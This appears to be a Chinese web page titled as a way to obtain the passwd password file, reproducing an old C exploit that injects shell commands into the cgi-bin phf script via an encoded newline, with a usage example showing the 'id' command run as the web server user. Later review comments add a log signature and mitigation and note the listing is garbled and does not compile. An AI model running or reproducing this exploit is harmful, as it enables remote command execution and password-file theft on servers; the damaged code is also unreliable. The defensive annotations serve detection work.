如何获取passwd密码档yu
phf.c
------ cut here----
/* Some small changes for efficiency by snocrash. */ /*
* cgi-bin phf exploit by loxsmith [xf]
*
* I wrote this in C because not every system is going to have lynx. Also,
* this saves the time it usually takes to remember the syntactical format
* of the exploit. Because of the host lookup mess, this will take
* approximately 12 seconds to execute with average network load. Be patient.
*
*/
#include
#include
#include
#include
#include
#include
#include
/*
 * Command-line client that sends one HTTP GET for /cgi-bin/phf to a host
 * and prints whatever the server sends back.
 *
 * Arguments: argv[1] = command text, argv[2] = hostname or dotted address,
 * argv[3] = optional TCP port (80 when omitted).
 *
 * Defender's reading: the only thing that reaches the server is the request
 * line built near the end of this function. Its fingerprint is a request for
 * /cgi-bin/phf whose Qalias value contains an encoded newline (%0a) followed
 * by extra text. That pattern in web access logs is what to search and alert
 * on. The weakness is in the server-side phf script, so the mitigation is to
 * remove or disable that script in cgi-bin; nothing in this client matters
 * once it is gone. The sample output printed on this page shows the injected
 * text executing under the web server's account (nobody).
 *
 * NOTE(review): this listing is extraction-damaged and does not compile as
 * shown (the #include lines above lost their header names, the encoding
 * loop has an empty character constant and an unbalanced parenthesis).
 * The code is left untouched here; the remarks below describe it as printed.
 */
int main(argc, argv)
int argc;
char **argv;
{
int i = 0, s, port, bytes = 128;
/* Fixed-size stack buffers; none of the writes into them below is bounded. */
char exploit[0xff], buffer[128], hostname[256], *command, j[2];
struct sockaddr_in sin;
struct hostent *he;
if (argc != 3 && argc != 4) {
fprintf(stderr, "Usage: %s command hostname [port]", argv[0]); exit(1);
}
/*
 * NOTE(review): the malloc result is not checked, and the buffer is never
 * initialised before the strcat calls below append to it. A space becomes
 * the three bytes "%20", so twice the input length is not an upper bound
 * on the encoded length.
 */
command = (char *)malloc(strlen(argv[1]) * 2);
/* Encoding loop: value 32 (space) is replaced by "%20", anything else is
 * appended unchanged via the two-byte scratch buffer j. */
while (argv[1] != '') {
if (argv[1] == 32) strcat(command, "%20"; else { sprintf(j, "%c", argv[1]);
strcat(command, j);
}
++i;
}
/* NOTE(review): unbounded copy of a command-line argument into hostname[256]. */
strcpy(hostname, argv[2]);
/* atoi reports no errors; a non-numeric port argument yields 0. */
if (argc == 4) port = atoi(argv[3]); else port = 80;
/*
 * NOTE(review): == binds tighter than =, so s_addr receives the result of
 * the comparison (0 or 1) rather than the parsed address, and the
 * gethostbyname branch runs only when inet_addr returned -1.
 */
if (sin.sin_addr.s_addr = inet_addr(hostname) == -1) { he = gethostbyname(hostname);
if (he) {
sin.sin_family = he->h_addrtype;
memcpy((caddr_t) &sin.sin_addr, he->h_addr_list[0], he->h_length);
} else {
fprintf(stderr, "%s: unknown host %s ", argv[0], hostname); exit(1);
}
}
/* Family is forced to AF_INET regardless of what the lookup returned. */
sin.sin_family = AF_INET;
sin.sin_port = htons((u_short) port);
if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) { fprintf(stderr, "%s: could not get socket ", argv[0]); exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { close(s);
fprintf(stderr, "%s: could not establish connection ", argv[0]); exit(1);
}
/*
 * The request line: this literal path and the Qalias=X%0a prefix are the
 * log signature described in the header comment.
 * NOTE(review): sprintf into exploit[0xff] is unbounded; the command text
 * comes straight from argv.
 */
sprintf(exploit, "GET /cgi-bin/phf/?Qalias=X%%0a%s ", command); free(command);
/* Return value of write is ignored, so a short or failed write goes unnoticed. */
write(s, exploit, strlen(exploit));
/*
 * Response loop: continues only while read returns exactly 128 bytes.
 * NOTE(review): the bytes come from the remote server and are untrusted.
 * They are passed to fprintf as the format string and are not
 * NUL-terminated, and a read error (-1) is not distinguished from
 * end of data.
 */
while(bytes == 128) {
bytes = read(s, buffer, 128);
fprintf(stdout, buffer);
}
close(s);
}
-------- cut here
使用举例:
bash% phf id xxx.org
------
Query Results
/usr/local/bin/ph -m alias=X
id
uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)